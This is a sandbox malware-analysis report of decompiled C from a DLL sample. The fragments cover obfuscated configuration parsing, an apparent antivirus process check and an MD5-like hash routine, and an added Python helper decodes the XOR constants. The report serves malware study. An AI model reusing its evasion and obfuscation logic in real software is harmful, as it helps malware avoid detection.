                                                  • HeapFree.KERNEL32(00000000,00ECD00C,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#,00ECD00C,?,00EC23E9), ref: 00EC221C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 5895e37ee2639fd45dd82420c0e9bea857b19ed628d8c5e7cf164316606e2be5
                                                  • Instruction ID: fc1e442d1977ee793aa5a1572973385a4f1e59543da8ab1a2e70bb26b4e3ad2b
                                                  • Opcode Fuzzy Hash: 5895e37ee2639fd45dd82420c0e9bea857b19ed628d8c5e7cf164316606e2be5
                                                  • Instruction Fuzzy Hash: B501D236600204AAE7085FEADF81FAA7299EB85364F50203EFE44F6170D6679C439221
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC1262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                  				signed short _t18;
                                                  				void* _t24;
                                                  				signed int _t26;
                                                  				signed short _t27;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t18 = E00EC9318(_a4, _a8, _a12, __esi); // executed
                                                  					_t27 = _t18;
                                                  				} else {
                                                  					_t27 = E00EC6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                  					if(_t27 == 0) {
                                                  						_t26 = _a8 >> 1;
                                                  						if(_t26 == 0) {
                                                  							_t27 = 2;
                                                  							HeapFree( *0xecd238, 0, _a12);
                                                  						} else {
                                                  							_t24 = _a12;
                                                  							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                                                  							 *__esi = _t24;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t27;
			}

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,00EC743A,?,004F0053,03009388,00000000,?), ref: 00EC12AD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 936b5a614fc38a86845b4c892e37e06453ae6d1043f56bc64e9a395fd9450e1a
                                                  • Instruction ID: e1d21bdf405c6fba5759464bab4819edb3870eaaf10d9d1e89ce6919ca49c116
                                                  • Opcode Fuzzy Hash: 936b5a614fc38a86845b4c892e37e06453ae6d1043f56bc64e9a395fd9450e1a
                                                  • Instruction Fuzzy Hash: F5016236100249FBDB158F44CD01FAE3BA6EB54350F14842CFA15AA171D732D822E710
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E00EC2436(intOrPtr* __edi) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _t15;
                                                  				intOrPtr* _t21;
                                                  
                                                  				_t21 = __edi;
                                                  				_push( &_v12);
                                                  				_push(__edi);
                                                  				_v8 = 0x1d4c0;
                                                  				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                  				while(1) {
                                                  					_v16 = _t15;
                                                  					Sleep(0x1f4); // executed
                                                  					if(_v12 == 4) {
                                                  						break;
                                                  					}
                                                  					if(_v8 == 0) {
                                                  						L4:
                                                  						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                  						continue;
                                                  					} else {
                                                  						if(_v8 <= 0x1f4) {
                                                  							_v16 = 0x80004004;
                                                  						} else {
                                                  							_v8 = _v8 - 0x1f4;
                                                  							goto L4;
                                                  						}
                                                  					}
                                                  					L8:
                                                  					return _v16;
                                                  				}
                                                  				goto L8;
			}

                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 00EC247E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: fef56f54b9cac89e21ec72aa4d0876486ca390c49d50d0fd041cae38f5582c4e
                                                  • Instruction ID: f3a615dd9e57c593ca706bed062e135e45b3a06e3d3e3dcf70b3777af52c3a79
                                                  • Opcode Fuzzy Hash: fef56f54b9cac89e21ec72aa4d0876486ca390c49d50d0fd041cae38f5582c4e
                                                  • Instruction Fuzzy Hash: ACF0F675C01219EBDB04DB94C588AEDB7B8BF04708F1080AEE612A3101D2B55A45CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(00EC3C81,?,?,00EC19A9,3D00ECC0,80000002,00EC3C81,00EC8B1E,74666F53,4D4C4B48,00EC8B1E,?,3D00ECC0,80000002,00EC3C81,?), ref: 00EC2679
                                                    • Part of subcall function 00EC1A03: SysAllocString.OLEAUT32(00EC8B1E), ref: 00EC1A1D
                                                    • Part of subcall function 00EC1A03: SysFreeString.OLEAUT32(00000000), ref: 00EC1A5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreelstrlen
                                                  • String ID:
                                                  • API String ID: 3808004451-0
                                                  • Opcode ID: 1d3fdd72b2412cd094f39fd20746abe56c26a7a530ad8e4c85acf61b8b2b60f3
                                                  • Instruction ID: 552d4091756a2c659497567d5a7300ef9e5d9c2c27838332ab7be9b984d624d3
                                                  • Opcode Fuzzy Hash: 1d3fdd72b2412cd094f39fd20746abe56c26a7a530ad8e4c85acf61b8b2b60f3
                                                  • Instruction Fuzzy Hash: 1AE0A57600010DBFCF129F90ED46E9A3F66EB04750F108019FA1924021C7339976EBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 92%
                                                  			E00EC4094(int* __ecx) {
                                                  				int _v8;
                                                  				void* _v12;
                                                  				void* __esi;
                                                  				signed int _t20;
                                                  				signed int _t25;
                                                  				char* _t31;
                                                  				char* _t32;
                                                  				char* _t33;
                                                  				char* _t34;
                                                  				char* _t35;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t38;
                                                  				intOrPtr _t39;
                                                  				void* _t41;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				signed int _t46;
                                                  				intOrPtr _t49;
                                                  				signed int _t50;
                                                  				signed int _t55;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				signed int _t60;
                                                  				signed int _t64;
                                                  				signed int _t68;
                                                  				signed int _t72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				void* _t85;
                                                  				intOrPtr _t102;
                                                  
                                                  				_t86 = __ecx;
                                                  				_t20 =  *0xecd278; // 0x63699bc3
                                                  				if(E00EC8748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                  					 *0xecd2d4 = _v12;
                                                  				}
                                                  				_t25 =  *0xecd278; // 0x63699bc3
                                                  				if(E00EC8748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                  					_push(2);
                                                  					_pop(0);
                                                  					goto L60;
                                                  				} else {
                                                  					_t85 = _v12;
                                                  					if(_t85 == 0) {
                                                  						_t31 = 0;
                                                  					} else {
                                                  						_t80 =  *0xecd278; // 0x63699bc3
                                                  						_t31 = E00EC3F7C(_t86, _t85, _t80 ^ 0x724e87bc);
                                                  					}
                                                  					if(_t31 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                  							 *0xecd240 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t32 = 0;
                                                  					} else {
                                                  						_t76 =  *0xecd278; // 0x63699bc3
                                                  						_t32 = E00EC3F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
                                                  					}
                                                  					if(_t32 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                  							 *0xecd244 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t33 = 0;
                                                  					} else {
                                                  						_t72 =  *0xecd278; // 0x63699bc3
                                                  						_t33 = E00EC3F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
                                                  					}
                                                  					if(_t33 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                  							 *0xecd248 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t34 = 0;
                                                  					} else {
                                                  						_t68 =  *0xecd278; // 0x63699bc3
                                                  						_t34 = E00EC3F7C(_t86, _t85, _t68 ^ 0x0602e249);
                                                  					}
                                                  					if(_t34 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                  							 *0xecd004 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t35 = 0;
                                                  					} else {
                                                  						_t64 =  *0xecd278; // 0x63699bc3
                                                  						_t35 = E00EC3F7C(_t86, _t85, _t64 ^ 0x3603764c);
                                                  					}
                                                  					if(_t35 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                  							 *0xecd02c = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t36 = 0;
                                                  					} else {
                                                  						_t60 =  *0xecd278; // 0x63699bc3
                                                  						_t36 = E00EC3F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                                                  					}
                                                  					if(_t36 != 0) {
                                                  						_push(_t36);
                                                  						_t57 = 0x10;
                                                  						_t58 = E00EC6ED2(_t57);
                                                  						if(_t58 != 0) {
                                                  							_push(_t58);
                                                  							E00ECA5D6();
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t37 = 0;
                                                  					} else {
                                                  						_t55 =  *0xecd278; // 0x63699bc3
                                                  						_t37 = E00EC3F7C(_t86, _t85, _t55 ^ 0xb30fc035);
                                                  					}
                                                  					if(_t37 != 0 && E00EC6ED2(0, _t37) != 0) {
                                                  						_t102 =  *0xecd32c; // 0x30095b0
                                                  						E00EC75E9(_t102 + 4, _t53);
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t38 = 0;
                                                  					} else {
                                                  						_t50 =  *0xecd278; // 0x63699bc3
                                                  						_t38 = E00EC3F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
                                                  					}
                                                  					if(_t38 == 0) {
                                                  						L51:
                                                  						_t39 =  *0xecd27c; // 0x213a5a8
						_t18 = _t39 + 0xece252; // 0x616d692f: first four bytes of the string at this offset, little-endian "/ima"
                                                  						 *0xecd2d0 = _t18;
                                                  						goto L52;
                                                  					} else {
                                                  						_t49 = E00EC6ED2(0, _t38);
                                                  						 *0xecd2d0 = _t49;
                                                  						if(_t49 != 0) {
                                                  							L52:
                                                  							if(_t85 == 0) {
                                                  								_t41 = 0;
                                                  							} else {
                                                  								_t46 =  *0xecd278; // 0x63699bc3
                                                  								_t41 = E00EC3F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
                                                  							}
                                                  							if(_t41 == 0) {
                                                  								_t42 =  *0xecd27c; // 0x213a5a8
								_t19 = _t42 + 0xece791; // 0x6976612e: first four bytes of the string at this offset, little-endian ".avi"
                                                  								_t43 = _t19;
                                                  							} else {
                                                  								_t43 = E00EC6ED2(0, _t41);
                                                  							}
                                                  							 *0xecd340 = _t43;
                                                  							HeapFree( *0xecd238, 0, _t85);
                                                  							L60:
                                                  							return 0;
                                                  						}
                                                  						goto L51;
                                                  					}
                                                  				}
                                                  			}

                                                  Instruction addresses for the decompiled lines above (side-by-side column in the original view, not recoverable line by line): 0x00ec4094 .. 0x00ec42e9

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC4119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC41AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC41E1
                                                  • HeapFree.KERNEL32(00000000,00EC23DE,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC42D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 1cf58f37567481899b1acfaee8d81245989a1ba9b670ac3da89890c348b56dd9
                                                  • Instruction ID: 723ae5ed2eee99bcdec2b10d887249c87890b26ebed0057752cc452a0ad983b2
                                                  • Opcode Fuzzy Hash: 1cf58f37567481899b1acfaee8d81245989a1ba9b670ac3da89890c348b56dd9
                                                  • Instruction Fuzzy Hash: 2661A2F0A14104AECB24EBB5DE95F9BB7ED9B48314729693DB401F3264E633DA878710
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
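
Worked example (added for this page; not code from the sample or from Joe Sandbox). Every lookup in E00EC4094 receives `*0xecd278 ^ <immediate>` rather than the immediate itself, so the value the lookup routine actually works with never appears as a literal in the binary, and the decompiler's `// 0x...` annotations on string-table pointers are the first four bytes of each string read as a little-endian dword. The script below recovers the eleven lookup values from the constants shown above, decodes the three annotated dwords (0x616d692f and 0x6976612e from E00EC4094, 0x73617661 from E00EC757F) into the ASCII they spell, and provides a name-matching helper. The CRC32 choice in `crc32_of` and the candidate names passed to it are assumptions for illustration; the report does not state what hash, if any, these values are.

```python
"""Recover the XOR-obfuscated lookup constants from E00EC4094 and decode the
dword string prefixes the decompiler annotated.

Added example for this report page; not code from the sample or from Joe
Sandbox. Numeric values are copied from the decompilation above."""
import struct
import zlib

# Global seed the function reads from 0xecd278 (decompiler comment: 0x63699bc3).
SEED = 0x63699BC3

# Immediates XORed with the seed before each lookup call, in call order.
# The first two go to E00EC8748, the remaining nine to E00EC3F7C.
OBFUSCATED = [
    0x8241C5A7, 0xECD84622,
    0x724E87BC, 0x2B40CC40, 0x3B27C2E6, 0x0602E249, 0x3603764C,
    0x2CC1F2FD, 0xB30FC035, 0x372AB5B7, 0xD8DC5CDE,
]

# Dword annotations the decompiler attached to string-table pointers
# (global base + offset); each is the first four bytes of that string.
STRING_DWORDS = {
    "E00EC4094 base+0xece252": 0x616D692F,
    "E00EC4094 base+0xece791": 0x6976612E,
    "E00EC757F base+0xecee54": 0x73617661,
}


def recover_lookup_keys(seed=SEED, constants=OBFUSCATED):
    """Return the values the lookup routines really receive: seed ^ immediate."""
    return [(seed ^ c) & 0xFFFFFFFF for c in constants]


def crc32_of(name):
    """Assumed key hash (assumption, not stated by the report): CRC32 of the ASCII name."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def match_candidates(recovered, candidates, hash_fn=crc32_of):
    """Map each recovered value to the first candidate whose hash equals it, or None."""
    table = {}
    for name in candidates:
        table.setdefault(hash_fn(name), name)
    return {value: table.get(value) for value in recovered}


def dword_ascii(value):
    """Render a 32-bit immediate as the four little-endian bytes it encodes."""
    return struct.pack("<I", value).decode("ascii", errors="replace")


if __name__ == "__main__":
    keys = recover_lookup_keys()
    for immediate, key in zip(OBFUSCATED, keys):
        print(f"0x{SEED:08x} ^ 0x{immediate:08x} = 0x{key:08x}")
    # Hypothetical candidate names, constructed for illustration only.
    for key, name in match_candidates(keys, ["alpha", "beta", "gamma"]).items():
        print(f"0x{key:08x} -> {name}")
    for label, dword in STRING_DWORDS.items():
        print(f"{label}: 0x{dword:08x} = {dword_ascii(dword)!r}")
```

Run it with any list of candidate key names an analyst wants to try; a `None` in the mapping means no candidate hashed to that value under the assumed hash, which is the expected result until the real hash and key names are known.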

                                                  C-Code - Quality: 68%
                                                  			E00EC757F() {
                                                  				char _v264;
                                                  				void* _v300;
                                                  				int _t8;
                                                  				intOrPtr _t9;
                                                  				int _t15;
                                                  				void* _t17;
                                                  
                                                  				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0); // 2 = TH32CS_SNAPPROCESS: snapshot of every process on the system
                                                  				if(_t17 != 0) {
                                                  					_t8 = Process32First(_t17,  &_v300);
                                                  					while(_t8 != 0) {
                                                  						_t9 =  *0xecd27c; // 0x213a5a8
						_t2 = _t9 + 0xecee54; // 0x73617661: first four bytes of the string at this offset, little-endian "avas"
						_push( &_v264); // _v300 is the PROCESSENTRY32; szExeFile sits at offset 36, so &_v264 is the process image name
						if( *0xecd0fc() != 0) { // indirect call through a function pointer stored at 0xecd0fc (not resolved by the decompiler)
                                                  							_t15 = 1;
                                                  						} else {
                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                  							continue;
                                                  						}
                                                  						L7:
                                                  						CloseHandle(_t17);
                                                  						goto L8;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L8:
                                                  				return _t15;
                                                  			}

                                                  Instruction addresses for the decompiled lines above (side-by-side column in the original view, not recoverable line by line): 0x00ec758a .. 0x00ec75e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EC758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 00EC75A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 00EC75CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 00EC75DD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 38a8fabe6fa62cdab9b8344f915ad7171f91fe130c9c2cbe6d5e51c33364fa1c
                                                  • Instruction ID: 78cbb90be8147bc6c724806765897e4f973726a1b74d3dcf89f57087995bb288
                                                  • Opcode Fuzzy Hash: 38a8fabe6fa62cdab9b8344f915ad7171f91fe130c9c2cbe6d5e51c33364fa1c
                                                  • Instruction Fuzzy Hash: 92F096716091255EDB20A7768F49FEB37ECDBD5354F001079F946F2101EA26CD4B4EA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00401850() {
                                                  				void* _t1;
                                                  				long _t3;
                                                  				void* _t4;
                                                  				long _t5;
                                                  				void* _t6;
                                                  				intOrPtr _t8;
                                                  				void* _t12;
                                                  
                                                  				_t8 =  *0x404130;
				_t1 = CreateEventA(0, 1, 0, 0); // unnamed, manual-reset, initially non-signalled
                                                  				 *0x40413c = _t1;
                                                  				if(_t1 == 0) {
                                                  					return GetLastError();
                                                  				}
				_t3 = GetVersion(); // low byte of the result is the OS major version; the folded compare below reads as a minimum-version gate
				if(_t3 != 5) {
                                                  					L4:
                                                  					if(_t12 <= 0) {
						_t4 = 0x32; // 50 = ERROR_NOT_SUPPORTED
                                                  						return _t4;
                                                  					} else {
                                                  						goto L5;
                                                  					}
                                                  				} else {
                                                  					if(_t3 > 0) {
                                                  						L5:
                                                  						 *0x40412c = _t3;
                                                  						_t5 = GetCurrentProcessId();
                                                  						 *0x404128 = _t5;
                                                  						 *0x404130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5); // opens its own PID: SYNCHRONIZE | QUERY_INFORMATION | DUP_HANDLE | VM_WRITE | VM_READ | VM_OPERATION | CREATE_THREAD
                                                  						 *0x404124 = _t6;
                                                  						if(_t6 == 0) {
                                                  							 *0x404124 =  *0x404124 | 0xffffffff;
                                                  						}
                                                  						return 0;
                                                  					} else {
                                                  						_t12 = _t3 - _t3;
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  			}

                                                  Instruction addresses for the decompiled lines above (side-by-side column in the original view, not recoverable line by line): 0x00401851 .. 0x004018be

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,751463F0), ref: 0040185F
                                                  • GetVersion.KERNEL32 ref: 0040186E
                                                  • GetCurrentProcessId.KERNEL32 ref: 00401885
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                  • String ID:
                                                  • API String ID: 845504543-0
                                                  • Opcode ID: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                  • Instruction ID: 6ae184293567ded7ec2751506ec64a9140b7551cf56f667d9c7c58b5119fcc5d
                                                  • Opcode Fuzzy Hash: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                  • Instruction Fuzzy Hash: 40F068B16412109AE710AF787F4DB553F98E759753F004236E644F92F4D37046818B5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c$t32c
                                                  • API String ID: 0-1046649395
                                                  • Opcode ID: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                  • Instruction ID: fa635e764d37422595d01632084abc2039ede2360133458ede7fd3f924d50477
                                                  • Opcode Fuzzy Hash: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                  • Instruction Fuzzy Hash: 16D1267290111ADFDF24DF90DD84BAAB7B5FB88318F1492E4D609B7211D230AE85DF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E00EC97F2(void* __ecx, intOrPtr* _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v56;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				intOrPtr _v72;
                                                  				void _v76;
                                                  				intOrPtr* _t226;
                                                  				signed int _t229;
                                                  				signed int _t231;
                                                  				signed int _t233;
                                                  				signed int _t235;
                                                  				signed int _t237;
                                                  				signed int _t239;
                                                  				signed int _t241;
                                                  				signed int _t243;
                                                  				signed int _t245;
                                                  				signed int _t247;
                                                  				signed int _t249;
                                                  				signed int _t251;
                                                  				signed int _t253;
                                                  				signed int _t255;
                                                  				signed int _t257;
                                                  				signed int _t259;
                                                  				signed int _t274;
                                                  				signed int _t337;
                                                  				void* _t347;
                                                  				signed int _t348;
                                                  				signed int _t350;
                                                  				signed int _t352;
                                                  				signed int _t354;
                                                  				signed int _t356;
                                                  				signed int _t358;
                                                  				signed int _t360;
                                                  				signed int _t362;
                                                  				signed int _t364;
                                                  				signed int _t366;
                                                  				signed int _t375;
                                                  				signed int _t377;
                                                  				signed int _t379;
                                                  				signed int _t381;
                                                  				signed int _t383;
                                                  				intOrPtr* _t399;
                                                  				signed int _t407;
                                                  				signed int _t409;
                                                  				signed int _t411;
                                                  				signed int _t413;
                                                  				signed int _t415;
                                                  				signed int _t417;
                                                  				signed int _t419;
                                                  				signed int _t421;
                                                  				signed int _t423;
                                                  				signed int _t425;
                                                  				signed int _t427;
                                                  				signed int _t429;
                                                  				signed int _t437;
                                                  				signed int _t439;
                                                  				signed int _t441;
                                                  				signed int _t443;
                                                  				signed int _t445;
                                                  				void* _t447;
                                                  				signed int _t507;
                                                  				signed int _t598;
                                                  				signed int _t606;
                                                  				signed int _t612;
                                                  				signed int _t678;
                                                  				signed int* _t681;
                                                  				signed int _t682;
                                                  				signed int _t684;
                                                  				signed int _t689;
                                                  				signed int _t691;
                                                  				signed int _t696;
                                                  				signed int _t698;
                                                  				signed int _t717;
                                                  				signed int _t719;
                                                  				signed int _t721;
                                                  				signed int _t723;
                                                  				signed int _t725;
                                                  				signed int _t727;
                                                  				signed int _t733;
                                                  				signed int _t739;
                                                  				signed int _t741;
                                                  				signed int _t743;
                                                  				signed int _t745;
                                                  				signed int _t747;
                                                  
                                                  				_t226 = _a4;
                                                  				_t347 = __ecx + 2;
                                                  				_t681 =  &_v76;
                                                  				_t447 = 0x10;
                                                  				do {
                                                  					_t274 =  *(_t347 - 1) & 0x000000ff;
                                                  					_t347 = _t347 + 4;
                                                  					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                                  					_t681 =  &(_t681[1]);
                                                  					_t447 = _t447 - 1;
                                                  				} while (_t447 != 0);
                                                  				_t6 = _t226 + 4; // 0x14eb3fc3
                                                  				_t682 =  *_t6;
                                                  				_t7 = _t226 + 8; // 0x8d08458b
                                                  				_t407 =  *_t7;
                                                  				_t8 = _t226 + 0xc; // 0x56c1184c
                                                  				_t348 =  *_t8;
                                                  				asm("rol eax, 0x7");
                                                  				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                                  				asm("rol ecx, 0xc");
                                                  				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                                  				asm("ror edx, 0xf");
                                                  				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
